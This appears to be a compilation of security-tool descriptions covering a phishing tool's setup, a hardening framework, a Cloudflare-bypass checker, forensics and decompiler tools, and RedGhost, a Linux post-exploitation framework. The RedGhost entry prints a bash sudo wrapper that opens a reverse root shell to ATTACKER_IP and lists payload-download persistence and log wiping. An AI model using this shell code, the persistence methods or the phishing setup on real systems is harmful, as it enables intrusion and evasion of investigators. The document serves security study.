After creating the application, copy the Application ID and change it on static/index.html.
The URL (external listener) that will be used for phishing should be added as a Redirect URL. To add a redirect URL, go to the application and click Add a Redirect URL.


The Redirect URL should be the URL that will be used to host the phishing endpoint, in this case https://myphishingurl.com/


Make sure to check both the boxes as shown below :


It should be noted that you can run this tool on any operating system that Go supports, but the macro backdooring functionality will only work on Windows.
The look of the phishing page can be changed on static/index.html.

Security Considerations
Apart from all the features this tool has, it also opens up some attack surface on the host running it. Firstly, the macro backdooring functionality opens the Word files, and if you are running an unpatched version of Office, bad things can happen. Additionally, the file extraction can download malicious files, which will be saved on your computer.
The best approach would be isolating the host properly and only allowing communication with the HTTPS redirector and Microsoft Graph API.

Management Interface
The management interface allows the operator to browse the data that has been extracted.

Users view


View User Emails


View Email



grapheneX - Automated System Hardening Framework


grapheneX
In computing, hardening is usually the process of securing a system by reducing its surface of vulnerability, which is larger when a system performs more functions; in principle a single-function system is more secure than a multipurpose one. Reducing available ways of attack typically includes changing default passwords, the removal of unnecessary software, unnecessary usernames or logins, and the disabling or removal of unnecessary services.

Although current technology tries to design systems to be as safe as possible, security flaws and situations that can lead to vulnerabilities, caused by unconscious use and missing configurations, still exist. The user must be knowledgeable about the technical side of the system architecture and should be aware of the importance of securing his/her system from such vulnerabilities. Unfortunately, it's not possible for every ordinary user to know all the details about hardening and the necessary commands, and hardening remains a technical issue due to the difficulty of understanding operating system internals. Therefore, hardening checklists that contain various commands and rules for a specified operating system are available on the internet, such as trimstray/linux-hardening-checklist and the Windows Server Hardening Checklist, providing a set of commands with their sections and, of course, simplifying the concept for the end user. But still, the user must know the commands and apply the hardening manually depending on the system. That's exactly where grapheneX comes into play.
The project name is derived from 'graphene'. Graphene is a one-atom-thick layer of carbon atoms arranged in a hexagonal lattice. In proportion to its thickness, it is about 100 times stronger than the strongest steel.
The grapheneX project aims to provide a framework for securing systems with hardening commands automatically. It's designed for the end user as well as for Linux and Windows developers, due to its interface options (interactive shell / web interface). In addition to that, grapheneX can be used to secure a web server/application.
Hardening commands and their scopes are referred to as modules and namespaces in the project. They live in the modules.json file after installation ($PYPATH/site-packages/graphenex/modules.json). Additionally, it's possible to add, edit or remove modules and namespaces, and the hardening operation can be automated with presets that contain a list of modules.
Currently, grapheneX supports the hardening sections below. Each of these namespaces contains more than one module.

  • Firewall
  • User
  • Network
  • Services
  • Kernel
  • Filesystem
  • Other


Installation
You can install grapheneX with pip. Usually this is the easiest way:
pip install graphenex
Also it's possible to run the setup.py for installation as follows:
python setup.py install 
The commands below can be used for testing the project without installation:
cd grapheneX
pipenv install
pipenv run python -m graphenex

Dependencies

Usage

Command Line Arguments
usage: grapheneX [-h] [-v] [-w] [--open] [host:port]
positional arguments:
host:port host and port to run the web interface

optional arguments:
-h, --help show this help message and exit
-v, --version show version information
-w, --web run the grapheneX web server
--open open browser on web server start

Interactive Shell
Execute grapheneX.py in order to start the interactive shell.


  • The animated gifs and screenshots added for demonstration show the test execution of an unversioned grapheneX. Use the grapheneX or python -m graphenex command for execution.
  • grapheneX currently supports Python 3.7.
  • Some of the project's functions (such as hardening) might not work without root access, so consider running grapheneX with sudo/administrative access.


Web Interface
Execute grapheneX.py with the -w or --web argument in order to start the web server.





  • The default host and port values are 0.0.0.0:8080. They can be changed via the host:port argument as shown below.

python grapheneX.py -w 192.168.1.36:8090

  • Use the --open argument to open the browser after the server starts.

python grapheneX.py -w --open

CLI Commands
Command    Description
back       Go back from namespace or module
clear      Clear the terminal
exit       Exit interactive shell
harden     Execute the hardening command
help       List available commands with "help" or show detailed help with "help <cmd>"
info       Show information about the module
list       List available hardening modules
manage     Add, edit or delete module
preset     Show/execute the hardening module presets
search     Search for modules
switch     Switch between modules or namespaces
use        Use a hardening module
web        Start the grapheneX web server

help
help or ? shows the commands list above.
help [CMD] shows the detailed usage of given command.

list
Show the available modules in a table. For example:



switch
The switch command can be used to switch to a namespace or use a module. It's helpful if you want to see the list of modules in a namespace.
switch [NAMESPACE]



  • Supports autocomplete for namespaces.

Also, using the switch command like this is possible:
switch [NAMESPACE]/[MODULE]
It's the equivalent of the use command in this situation.

use
Serves the purpose of selecting a hardening module.
use [MODULE]


  • Supports autocomplete for modules.


info
Shows information (namespace, description, OS command) about the selected module.


harden
Executes the hardening command of the selected module.


preset
grapheneX has presets that contain particular modules for automating the hardening operation. Presets can be customized with the modules.json file and they can contain any supported module. The preset command shows the available module presets, and preset [PRESET] runs the hardening commands in a preset.


An example preset command output is shown above. Below, a preset that contains 2 modules is selected and its hardening modules are executed.


The preset command supports autocomplete for preset names. It also supports an option for asking permission before each hardening command execution, so that the user knows what he/she is doing.

  • Adding module presets

Presets are stored in the presets element inside the modules.json file. This JSON file can be edited for updating the presets.
"presets": [
{
"name": "Preset_1",
"modules": [
"namespace1/Module_Name1",
"namespace2/Module_Name2",
],
"target_os": "linux/win"
},
{
"name": "Preset_2",
"modules": [
"namespace/All"
],
"target_os": "linux/win"
}
]
namespace/All means every hardening command in that namespace will be executed.
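To make the preset flow concrete, here is a simplified Python sketch of how a runner could resolve and execute preset modules based on the JSON layout above (an illustration, not grapheneX's actual implementation):

import json
import subprocess

with open("modules.json") as f:
    data = json.load(f)

def run_preset(preset_name):
    preset = next(p for p in data["presets"] if p["name"] == preset_name)
    for entry in preset["modules"]:
        namespace, wanted = entry.split("/")
        for module in data[namespace]:
            # "All" executes every hardening command in the namespace.
            if wanted in ("All", module["name"]):
                subprocess.run(module["command"], shell=True)

run_preset("Preset_1")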

search
search [QUERY]


manage
The manage command allows you to add, edit or remove modules.

  • Adding modules with manage

Follow the instructions for adding a new module. Choose the 'new' option in the namespace prompt for creating a new namespace.


  • Adding modules manually

grapheneX stores the modules and namespaces in the modules.json file. A new module will show up once a new element is created in this JSON file. An example element is given below.
"namespace": [
{
"name": "Module_Name",
"desc": "This is the module description.",
"command": "echo 'hardening command'",
"require_superuser": "True/False",
"target_os": "linux/win"
}
]
It's recommended to add modules from the CLI or the web interface rather than editing the modules.json file.

  • Editing modules

Choose the edit option after the manage command for editing the module properties.


Or edit the modules.json manually.

  • Removing modules

Choosing the remove option in the manage menu is enough to remove the specified module. It's also possible to remove a module from modules.json manually.


web
Starts the grapheneX web server with the optional host:port argument.
web [host:port]


back
Go back from selected namespace or module.

clear
Clear terminal

exit
Exit interactive shell

Web
Most of the command line features are accessible with the Web interface.

Namespaces & Modules
It's easy to switch between namespaces and see details of modules.


Hardening
Just click run under the module properties for executing the hardening command.


Adding Modules
There's a menu available in the web interface for adding new modules.


Screenshots






TODO(s)
  • Add new modules for Linux and Windows.



Cloudcheck - Checks Using A Test String If A Cloudflare DNS Bypass Is Possible Using CloudFail


Cloudcheck is made to be used in the same folder as CloudFail. Make sure all files in this repo are in the same folder before using it.
Also create an empty text file called none.txt in the data folder, so that it doesn't run a subdomain brute-force when testing.

Cloudcheck will automatically change your hosts file, using entries from CloudFail, and test for a specified string to detect whether a given entry can be used to bypass Cloudflare.
If the output comes out as "True", you can use that IP address in your hosts file to bypass Cloudflare.
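The core check boils down to pointing the domain at a candidate origin IP and looking for the test string. A rough Python sketch of that idea (Cloudcheck itself edits the hosts file; pinning via a Host header as below is just an equivalent shortcut for plain HTTP):

import requests

def bypass_works(domain, candidate_ip, test_string):
    # Send the request straight to the candidate IP while presenting
    # the original domain in the Host header.
    resp = requests.get("http://%s/" % candidate_ip,
                        headers={"Host": domain}, timeout=10)
    return test_string in resp.text

print(bypass_works("example.com", "203.0.113.10", "Welcome"))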


Orbit v2.0 - Blockchain Transactions Investigation Tool


Introduction
Orbit is designed to explore the network of a blockchain wallet by recursively crawling through its transaction history. The data is rendered as a graph to reveal major sources, sinks and suspicious connections.
Note: Orbit only runs on Python 3.2 and above.

Usage
Let's start by crawling the transaction history of a wallet:
python3 orbit.py -s 1AJbsFZ64EpEfS5UAjAfcUG8pH8Jn3rn1F
Crawling multiple wallets is no different.
python3 orbit.py -s 1AJbsFZ64EpEfS5UAjAfcUG8pH8Jn3rn1F,1ETBbsHPvbydW7hGWXXKXZ3pxVh3VFoMaX
Orbit fetches the last 50 transactions from each wallet by default, but this can be tuned with the -l option.
python3 orbit.py -s 1AJbsFZ64EpEfS5UAjAfcUG8pH8Jn3rn1F -l 100
Orbit's default crawling depth is 3, i.e. it fetches the history of the target wallet(s), crawls the newly found wallets, and then crawls the wallets found in those results again. The crawling depth can be increased or decreased with the -d option.
python3 orbit.py -s 1AJbsFZ64EpEfS5UAjAfcUG8pH8Jn3rn1F -d 2
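Conceptually, this depth-limited crawl is a breadth-first traversal over wallets. A simplified sketch (fetch_peers is a hypothetical stand-in for the block-explorer API call Orbit makes):

from collections import deque

def fetch_peers(wallet, limit):
    # Hypothetical helper: return counterparties seen in the wallet's
    # last `limit` transactions (a real version would query an API).
    return []

def crawl(seed_wallets, depth=3, limit=50):
    graph = {}
    frontier = deque((wallet, 0) for wallet in seed_wallets)
    while frontier:
        wallet, level = frontier.popleft()
        if wallet in graph or level >= depth:
            continue
        peers = fetch_peers(wallet, limit)
        graph[wallet] = peers
        frontier.extend((peer, level + 1) for peer in peers)
    return graph

graph = crawl(["1AJbsFZ64EpEfS5UAjAfcUG8pH8Jn3rn1F"], depth=2)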
Wallets that have made just a couple of interactions with our target may not be important; Orbit can be told to crawl only the top N wallets at each level by using the -t option.
python3 orbit.py -s 1AJbsFZ64EpEfS5UAjAfcUG8pH8Jn3rn1F -t 20
If you want to use the collected data in some other way, you can save it to a JSON file by using the -o option as follows:
python3 orbit.py -s 1AJbsFZ64EpEfS5UAjAfcUG8pH8Jn3rn1F -o output.json
This is your terminal dashboard.


Visualization
Once the scan is complete, the graph will automatically open in your default browser. If it doesn't open, open quark.html manually. Don't worry if your graph looks messy like the one below or worse.


Select the Make Clusters option to form clusters using a community detection algorithm. After that, you can use Color Clusters to give a different color to each community, and then use the Spacify option to fix overlapping nodes & edges.


The thickness of edges depends on the frequency of transactions between two wallets while the size of a node depends on both transaction frequency and the number of connections of the node.
As Orbit uses Quark to render the graph, more information about the various features and controls is available in Quark's README.


Vulnado - Purposely Vulnerable Java Application To Help Lead Secure Coding Workshops

This application and exercises will take you through some of the OWASP top 10 Vulnerabilities and how to prevent them.

Up and running
  1. Install Docker for MacOS or Windows. You'll need to create a Docker account if you don't already have one.
  2. git clone git://github.com/ScaleSec/vulnado
  3. cd vulnado
  4. docker-compose up
  5. Open a browser and navigate to the client to make sure it's working: http://localhost:1337
  6. Then back in your terminal verify you have connection to your API server: nc -vz localhost 8080

Architecture
The docker network created by docker-compose maps pretty well to a multi-tier architecture where a web server is publicly available and there are other network resources like a database and internal site that are not publicly available.



Exercises


OSXCollector - A Forensic Evidence Collection & Analysis Toolkit For OS X


OSXCollector is a forensic evidence collection & analysis toolkit for OSX.

Forensic Collection
The collection script runs on a potentially infected machine and outputs a JSON file that describes the target machine. OSXCollector gathers information from plists, SQLite databases and the local file system.

Forensic Analysis
Armed with the forensic collection, an analyst can answer questions like:
  • Is this machine infected?
  • How'd that malware get there?
  • How can I prevent and detect further infection?
Yelp automates the analysis of most OSXCollector runs, converting the output into an easily readable and actionable summary of just the suspicious stuff. Check out the OSXCollector Output Filters project to learn how to make the most of the automated OSXCollector output analysis.

Performing Collection
osxcollector.py is a single Python file that runs without any dependencies on a standard OSX machine. This makes it really easy to run collection on any machine - no fussing with brew, pip, config files, or environment variables. Just copy the single file onto the machine and run it; sudo osxcollector.py is all it takes.
$ sudo osxcollector.py
Wrote 35394 lines.
Output in osxcollect-2014_12_21-08_49_39.tar.gz
If you have just cloned the GitHub repository, osxcollector.py is inside the osxcollector/ directory, so you need to run it as:
$ sudo osxcollector/osxcollector.py
IMPORTANT: please make sure that the python command on your Mac OS X machine uses the default Python interpreter shipped with the system and is not overridden, e.g. by a Python version installed through brew. OSXCollector relies on a couple of native Python bindings for OS X libraries, which might not be available in Python versions other than the one originally installed on your system. Alternatively, you can run osxcollector.py explicitly specifying the Python version you would like to use:
$ sudo /usr/bin/python2.7 osxcollector/osxcollector.py
The JSON output of the collector, along with some helpful files like system logs, has been bundled into a .tar.gz for hand-off to an analyst.
osxcollector.py also has a lot of useful options to change how collection works:
  • -i INCIDENT_PREFIX/--id=INCIDENT_PREFIX: Sets an identifier which is used as the prefix of the output file. The default value is osxcollect.
    $ sudo osxcollector.py -i IncontinentSealord
    Wrote 35394 lines.
    Output in IncontinentSealord-2014_12_21-08_49_39.tar.gz
    Get creative with incident names, it makes it easier to laugh through the pain.
  • -p ROOTPATH/--path=ROOTPATH: Sets the path to the root of the filesystem to run collection on. The default value is /. This is great for running collection on the image of a disk.
    $ sudo osxcollector.py -p '/mnt/powned'
  • -s SECTION/--section=SECTION: Runs only a portion of the full collection. Can be specified more than once. The full list of sections and subsections is:
    • version
    • system_info
    • kext
    • startup
      • launch_agents
      • scripting_additions
      • startup_items
      • login_items
    • applications
      • applications
      • install_history
    • quarantines
    • downloads
      • downloads
      • email_downloads
      • old_email_downloads
    • chrome
      • history
      • archived_history
      • cookies
      • login_data
      • top_sites
      • web_data
      • databases
      • local_storage
      • preferences
    • firefox
      • cookies
      • downloads
      • formhistory
      • history
      • signons
      • permissions
      • addons
      • extension
      • content_prefs
      • health_report
      • webapps_store
      • json_files
    • safari
      • downloads
      • history
      • extensions
      • databases
      • localstorage
      • extension_files
    • accounts
      • system_admins
      • system_users
      • social_accounts
      • recent_items
    • mail
    • full_hash
    $ sudo osxcollector.py -s 'startup' -s 'downloads'
  • -c/--collect-cookies: Collect cookies' value. By default OSXCollector does not dump the value of a cookie, as it may contain sensitive information (e.g. session id).
  • -l/--collect-local-storage: Collect the values stored in web browsers' local storage. By default OSXCollector does not dump the values as they may contain sensitive information.
  • -d/--debug: Enables verbose output and python breakpoints. If something is wrong with OSXCollector, try this.
    $ sudo osxcollector.py -d

Details of Collection
The collector outputs a .tar.gz containing all the collected artifacts. The archive contains a JSON file with the majority of the information. Additionally, a set of useful logs from the target system is included.

Common Keys

Every Record
Each line of the JSON file records 1 piece of information. There are some common keys that appear in every JSON record:
  • osxcollector_incident_id: A unique ID shared by every record.
  • osxcollector_section: The section or type of data this record holds.
  • osxcollector_subsection: The subsection or more detailed descriptor of the type of data this record holds.

File Records
For records representing files there are a bunch of useful keys:
  • atime: The file accessed time.
  • ctime: The file creation time.
  • mtime: The file modified time.
  • file_path: The absolute path to the file.
  • md5: MD5 hash of the file contents.
  • sha1: SHA1 hash of the file contents.
  • sha2: SHA2 hash of the file contents.
For records representing downloaded files:
  • xattr-wherefrom: A list containing the source and referrer URLs for the downloaded file.
  • xattr-quarantines: A string describing which application downloaded the file.

SQLite Records
For records representing a row of a SQLite database:
  • osxcollector_table_name: The table name the row comes from.
  • osxcollector_db_path: The absolute path to the SQLite file.
For records that represent data associated with a specific user:
  • osxcollector_username: The name of the user

Timestamps
OSXCollector attempts to convert timestamps to human readable date/time strings in the format YYYY-mm-dd hh:MM:ss. It uses heuristics to automatically identify various timestamps:
  • seconds since epoch
  • milliseconds since epoch
  • seconds since 2001-01-01
  • seconds since 1601-01-01
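A sketch of how such heuristics can work (an illustration, not OSXCollector's actual code): try each base and keep the first interpretation that lands in a plausible date window.

from datetime import datetime, timedelta

BASES = [
    (datetime(1970, 1, 1), 1),     # seconds since epoch
    (datetime(1970, 1, 1), 1000),  # milliseconds since epoch
    (datetime(2001, 1, 1), 1),     # seconds since 2001-01-01 (Apple absolute time)
    (datetime(1601, 1, 1), 1),     # seconds since 1601-01-01 (Windows-style)
]

def to_datetime(value):
    for base, divisor in BASES:
        try:
            candidate = base + timedelta(seconds=float(value) / divisor)
        except OverflowError:
            continue
        if datetime(2000, 1, 1) <= candidate <= datetime(2030, 1, 1):
            return candidate.strftime("%Y-%m-%d %H:%M:%S")
    return None

print(to_datetime(1419151779))  # -> 2014-12-21 08:49:39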

Sections

version section
The current version of OSXCollector.

system_info section
Collects basic information about the system:
  • system name
  • node name
  • release
  • version
  • machine

kext section
Collects the Kernel extensions from:
  • /System/Library/Extensions
  • /Library/Extensions

startup section
Collects information about the LaunchAgents, LaunchDaemons, ScriptingAdditions, StartupItems and other login items from:
  • /System/Library/LaunchAgents
  • /System/Library/LaunchDaemons
  • /Library/LaunchAgents
  • ~/Library/LaunchAgents
  • /Library/LaunchDaemons
  • /System/Library/ScriptingAdditions
  • /Library/ScriptingAdditions
  • /System/Library/StartupItems
  • /Library/StartupItems
  • ~/Library/Preferences/com.apple.loginitems.plist
More information about the Mac OS X startup process can be found here: http://www.malicious-streams.com/article/Mac_OSX_Startup.pdf

applications section
Hashes installed applications and gathers install history from:
  • /Applications
  • ~/Applications
  • /Library/Receipts/InstallHistory.plist

quarantines section
Quarantines are basically the info necessary to show the 'Are you sure you wanna run this?' prompt when a user tries to open a file downloaded from the Internet. For some more details, check out the Apple Support explanation of Quarantines: http://support.apple.com/kb/HT3662
This section also collects information from the XProtect hash-based malware check for quarantined files. The plist is at: /System/Library/CoreServices/CoreTypes.bundle/Contents/Resources/XProtect.plist
XProtect also adds minimum versions for Internet plug-ins. That plist is at: /System/Library/CoreServices/CoreTypes.bundle/Contents/Resources/XProtect.meta.plist
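If you want to eyeball these plists yourself, plutil (which ships with OS X) can pretty-print them; a quick example:
$ plutil -p /System/Library/CoreServices/CoreTypes.bundle/Contents/Resources/XProtect.plist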

downloads section
Hashes all users' downloaded files from:
  • ~/Downloads
  • ~/Library/Mail Downloads
  • ~/Library/Containers/com.apple.mail/Data/Library/Mail Downloads

chrome section
Collects the following information from the Google Chrome web browser:
  • History
  • Archived History
  • Cookies
  • Extensions
  • Login Data
  • Top Sites
  • Web Data
This data is extracted from ~/Library/Application Support/Google/Chrome/Default
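Since these are plain SQLite databases, you can also inspect a copy of them by hand (Chrome locks the live file, so copy it first; the urls table is part of Chrome's standard History schema):
$ cp ~/Library/Application\ Support/Google/Chrome/Default/History /tmp/History
$ sqlite3 /tmp/History 'SELECT url, title FROM urls LIMIT 5;'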

firefox section
Collects information from the different SQLite databases in a Firefox profile:
  • Cookies
  • Downloads
  • Form History
  • History
  • Signons
  • Permissions
  • Addons
  • Extensions
  • Content Preferences
  • Health Report
  • Webapps Store
This information is extracted from ~/Library/Application Support/Firefox/Profiles
For more details about Firefox profile folder see http://kb.mozillazine.org/Profile_folder_-_Firefox
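As with Chrome, you can query a copy of these databases directly; for example, history lives in the moz_places table of places.sqlite (the profile directory name varies per install, hence the glob):
$ sqlite3 ~/Library/Application\ Support/Firefox/Profiles/*.default/places.sqlite 'SELECT url, title FROM moz_places LIMIT 5;'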

safari section
Collects information from the different plists and SQLite databases in a Safari profile:
  • Downloads
  • History
  • Extensions
  • Databases
  • Local Storage

accounts section
Collects information about users' accounts:
  • system admins: /private/var/db/dslocal/nodes/Default/groups/admin.plist
  • system users: /private/var/db/dslocal/nodes/Default/users
  • social accounts: ~/Library/Accounts/Accounts3.sqlite
  • users' recent items: ~/Library/Preferences/com.apple.recentitems.plist

mail section
Hashes files in the mail app directories:
  • ~/Library/Mail
  • ~/Library/Mail Downloads

full_hash section
Hashes all the files on disk. All of 'em. This does not run by default. It must be triggered with:
$ sudo osxcollector.py -s full_hash

Basic Manual Analysis
Forensic analysis is a bit of art and a bit of science. Every analyst will see a bit of a different story when reading the output from OSXCollector. That's part of what makes analysis fun.
Generally, collection is performed on a target machine because something is hinky: anti-virus found a file it doesn't like, deep packet inspection observed a callout, or endpoint monitoring noticed a new startup item. The details of this initial alert - a file path, a timestamp, a hash, a domain, an IP, etc. - are enough to get going.

Timestamps
Simply grepping a few minutes before and after a timestamp works great:
$ cat INCIDENT32.json | grep '2014-01-01 11:3[2-8]'

Browser History
It's in there. A tool like jq can be very helpful to do some fancy output:
$ cat INCIDENT32.json | grep '2014-01-01 11:3[2-8]' | jq 'select(has("url"))|.url'

A Single User
$ cat INCIDENT32.json | jq 'select(.osxcollector_username=="ivanlei")|.'

Automated Analysis
The OSXCollector Output Filters project contains filters that process and transform the output of OSXCollector. The goal of filters is to make it easy to analyze OSXCollector output.

Development Tips
The functionality of OSXCollector is stored in a single file: osxcollector.py. The collector should run on a naked install of OS X without any additional packages or dependencies.
Ensure that all of the OSXCollector tests pass before editing the source code. You can run the tests using: make test
After making changes to the source code, run make test again to verify that your changes did not break any of the tests.

License
This work is licensed under the GNU General Public License and is a derivation of https://github.com/jipegit/OSXAuditor

Blog post

Presentations

External Presentations

Resources
Want to learn more about OS X forensics?
A couple of other interesting tools:
  • KnockKnock - KnockKnock is a command line python script that displays persistent OS X binaries that are set to execute automatically at each boot.
  • Grr - Google Rapid Response: remote live forensics for incident response
  • osquery - SQL powered operating system instrumentation, monitoring, and analytics



Uncompyle6 - A Cross-Version Python Bytecode Decompiler


A native Python cross-version decompiler and fragment decompiler. The successor to decompyle, uncompyle, and uncompyle2.


Introduction
uncompyle6 translates Python bytecode back into equivalent Python source code. It accepts bytecodes from Python version 1.3 to version 3.8, spanning over 24 years of Python releases. We include Dropbox's Python 2.5 bytecode and some PyPy bytecode.


Why this?
Ok, I'll say it: this software is amazing. It is more than your normal hacky decompiler. Using compiler technology, the program creates a parse tree of the program from the instructions; nodes at the upper levels look a little like what might come from a Python AST. So we can really classify and understand what's going on in sections of Python bytecode.
Building on this, another thing that makes this different from other CPython bytecode decompilers is the ability to deparse just fragments of source code and give source-code information around a given bytecode offset.
I use the tree fragments to deparse fragments of code at run time inside my trepan debuggers. For that, bytecode offsets are recorded and associated with fragments of the source code. This purpose, although compatible with the original intention, is a little bit different. See this for more information.
Python fragment deparsing given an instruction offset is useful in showing stack traces and can be incorporated into any program that wants to show a location in more detail than just a line number at runtime. This code can also be used when source-code information does not exist and there is just bytecode. Again, my debuggers make use of this.
There were (and still are) a number of decompyle, uncompyle, uncompyle2, uncompyle3 forks around. Almost all of them come basically from the same code base, and (almost?) all of them are no longer actively maintained. One was really good at decompiling Python 1.5-2.3 or so, another really good at Python 2.7, but only that. Another handles Python 3.2 only; another patched that and handled only 3.3. You get the idea. This code pulls all of these forks together and moves forward. There is some serious refactoring and cleanup in this code base over those old forks.
This demonstrably does the best job of decompiling Python across all Python versions. And even when another project provides decompilation for only a subset of Python versions, we generally do demonstrably better for those as well.
How can we tell? By taking Python bytecode that comes distributed with that version of Python and decompiling these. Among those that successfully decompile, we can then make sure the resulting programs are syntactically correct by running the Python interpreter for that bytecode version. Finally, in cases where the program has a test for itself, we can run the check on the decompiled code.
We are serious about testing, and use automated processes to find bugs. In the issue trackers for other decompilers, you will find a number of bugs we've found along the way. Very few to none of them are fixed in the other decompilers.


Requirements
The code here can be run on Python versions 2.6 or later, PyPy 3-2.4, or PyPy-5.0.1. Python versions 2.4-2.7 are supported in the python-2.4 branch. The bytecode files it can read have been tested on Python bytecodes from versions 1.4, 2.1-2.7, and 3.0-3.8 and the above-mentioned PyPy versions.


Installation
This uses setup.py, so it follows the standard Python routine:
pip install -e .  # set up to run from source tree
# Or if you want to install instead
python setup.py install # may need sudo
A GNU makefile is also provided so make install (possibly as root or sudo) will do the steps above.


Running Tests
make check
A GNU makefile has been added to smooth over setting up and running the right commands, and to run tests from fastest to slowest.
If you have remake installed, you can see the list of all tasks including tests via remake --tasks


Usage
Run
$ uncompyle6 *compiled-python-file-pyc-or-pyo*
For usage help:
$ uncompyle6 -h


Verification
In older versions of Python it was possible to verify bytecode by decompiling bytecode, and then compiling using the Python interpreter for that bytecode version. Having done this, the bytecode produced could be compared with the original bytecode. However, as Python's code generation got better, this was no longer feasible.
If you want Python syntax verification of the correctness of the decompilation process, add the --syntax-verify option. However, since Python syntax changes, you should use this option only if the bytecode is the right bytecode for the Python interpreter that will be checking the syntax.
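For example (assuming the bytecode was produced by the same Python version as the interpreter running the check; the filename is a placeholder):
$ uncompyle6 --syntax-verify myfile.pyc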
You can also cross-compare the results with another Python decompiler like pycdc. Since they work differently, bugs here often aren't in that, and vice versa.
There is an interesting class of readily available programs that gives stronger verification: programs that test themselves when run. Our test suite includes these.
And Python comes with another set of programs like this: its test suite for the standard library. We have some code in test/stdlib to facilitate this kind of checking too.


Known Bugs/Restrictions
The biggest known and possibly fixable (but hard) problem has to do with handling control flow. (Python has probably the most diverse and screwy set of compound statements I've ever seen; there are "else" clauses on loops and try blocks that I suspect many programmers don't know about.)
All of the Python decompilers that I have looked at have problems decompiling Python's control flow. In some cases we can detect an erroneous decompilation and report that.
Python support is strongest in Python 2 for 2.7, and drops off as you get further away from that. Support is also probably pretty good for Python 2.3-2.4, since a lot of the goodness of the early versions of the decompiler from that era has been preserved (and Python compilation in that era was minimal).
There is some work to do on the lower-end Python versions, which are more difficult for us to handle since we don't have a Python interpreter for versions 1.6 and 2.0.
In the Python 3 series, Python support is strongest around 3.4 or 3.3 and drops off as you move further away from those versions. Python 3.0 is weird in that it in some ways resembles 2.6 more than it does 3.1 or 2.7. Python 3.6 changes things drastically by using word codes rather than byte codes. As a result, the jump offset field in a jump instruction argument has been reduced, which makes EXTENDED_ARG instructions more prevalent in jump instructions; previously they had been rare. Perhaps to compensate for the additional EXTENDED_ARG instructions, additional jump optimization has been added. So, in sum, handling control flow by ad hoc means, as is currently done, is worse.
Between Python 3.5, 3.6 and 3.7 there have been major changes to the MAKE_FUNCTION and CALL_FUNCTION instructions.
Currently not all Python magic numbers are supported. Specifically, in some versions of Python, notably Python 3.6, the magic number has changed several times within a version.
We support only released versions, not candidate versions. Note however that the magic of a released version is usually the same as the last candidate version prior to release.
There are also customized Python interpreters, notably Dropbox's, which use their own magic and encrypt bytecode. With the exception of Dropbox's old Python 2.5 interpreter, this kind of thing is not handled.
We also don't handle PJOrion obfuscated code. For that, try PJOrion Deobfuscator to unscramble the bytecode into valid bytecode before trying this tool. This program can't decompile Microsoft Windows EXE files created by Py2EXE, although we can probably decompile the code after you extract the bytecode properly. For situations like this, you might want to consider a decompilation service like Crazy Compilers. Handling pathologically long lists of expressions or statements is slow.
There is lots to do, so please dig in and help.


See Also


Recon-ng v5.0.0 - Open Source Intelligence Gathering Tool Aimed At Reducing The Time Spent Harvesting Information From Open Sources


Recon-ng is a full-featured reconnaissance framework designed with the goal of providing a powerful environment to conduct open-source web-based reconnaissance quickly and thoroughly.

Recon-ng has a look and feel similar to the Metasploit Framework, reducing the learning curve for leveraging the framework. However, it is quite different. Recon-ng is not intended to compete with existing frameworks, as it is designed exclusively for web-based open source reconnaissance. If you want to exploit, use the Metasploit Framework. If you want to social engineer, use the Social-Engineer Toolkit. If you want to conduct reconnaissance, use Recon-ng! See the Wiki to get started.

Recon-ng is a completely modular framework and makes it easy for even the newest of Python developers to contribute. See the Development Guide for more information on building and maintaining modules.


RedGhost v3.0 - Linux Post Exploitation Framework Written In Bash Designed To Assist Red Teams In Persistence, Reconnaissance, Privilege Escalation And Leaving No Trace




Linux post exploitation framework designed to assist red teams in persistence, reconnaissance, privilege escalation and leaving no trace.

  • Payloads

Function to generate various encoded reverse shells in netcat, bash, python, php, ruby, perl
  • SudoInject
Function to inject the sudo command with a wrapper function that runs a reverse root shell every time "sudo" is run, for privilege escalation (see the sketch after this list)
  • lsInject
Function to inject the "ls" command with a wrapper function that runs a payload every time "ls" is run, for persistence
  • SSHKeyInject
Function to log keystrokes of an ssh process using strace
  • Crontab
Function to create a cron job that downloads a payload from a remote server and runs it every minute, for persistence
  • SysTimer
Function to create a systemd timer that downloads and executes a payload every 30 seconds, for persistence.
  • GetRoot
Function to try various methods to escalate privileges
  • Clearlogs
Function to clear logs and make forensic investigation difficult
  • MassInfoGrab
Function to grab mass reconnaissance/information on the system
  • CheckVM
Function to check if the system is a virtual machine
  • MemoryExec
Function to execute remote bash script in memory
  • BanIp
Function to ban an IP address using iptables
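To make the wrapper idea behind SudoInject concrete, here is a minimal sketch of the technique (illustrative only, not RedGhost's actual code; ATTACKER_IP and port 4444 are placeholders) as it might be appended to a victim's ~/.bashrc:

# Illustrative sudo wrapper; not RedGhost's actual code
function sudo () {
    # Run the real sudo so the victim sees normal behavior
    command sudo "$@"
    # Reuse the cached sudo credentials (-n: never prompt) to quietly
    # spawn a background reverse root shell to the attacker's listener
    command sudo -n bash -c 'bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1 &' 2>/dev/null
}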

Installation
One-liner to install RedGhost:
wget https://raw.githubusercontent.com/d4rk007/RedGhost/master/redghost.sh; chmod +x redghost.sh; ./redghost.sh
One-liner to install prerequisites and RedGhost:
wget https://raw.githubusercontent.com/d4rk007/RedGhost/master/redghost.sh; chmod +x redghost.sh; apt-get install dialog; apt-get install gcc; apt-get install iptables; apt-get install strace; ./redghost.sh

Prerequisites
dialog, gcc, iptables, strace


WeebDNS - DNS Enumeration With Asynchronicity


DNS Enumeration Tool with Asynchronicity.

Features
WeebDNS is an asynchronous DNS enumeration tool written in Python 3, which makes it much faster than conventional tools (see the sketch after the prerequisites below).

PREREQUISITES
  • Python 3.x
  • pip3
  • git

PYTHON 3 PREREQUISITES
  • aiohttp
  • asyncio
  • aiodns
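The speed-up comes from resolving many names concurrently instead of one at a time. A minimal sketch of that pattern with aiodns (a generic illustration, not WeebDNS's actual code; the domain and wordlist are invented):

import asyncio
import aiodns

async def resolve_all(domain, words):
    # One resolver shared by all concurrent queries
    resolver = aiodns.DNSResolver()

    async def resolve(name):
        try:
            answers = await resolver.query(name, 'A')
            return name, [a.host for a in answers]
        except aiodns.error.DNSError:
            return name, []  # NXDOMAIN, timeout, etc.

    # Fire all queries at once and gather the results
    return await asyncio.gather(*(resolve(f'{w}.{domain}') for w in words))

results = asyncio.run(resolve_all('example.com', ['www', 'mail', 'ftp', 'dev']))
for name, ips in results:
    print(name, ips or '-')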

Installation

Resolve dependencies
Ubuntu/Debian System
$ sudo apt-get install git python3 python3-pip -y

Getting and Running WeebDNS
$ git clone https://github.com/WeebSec/weebdns.git
$ cd weebdns
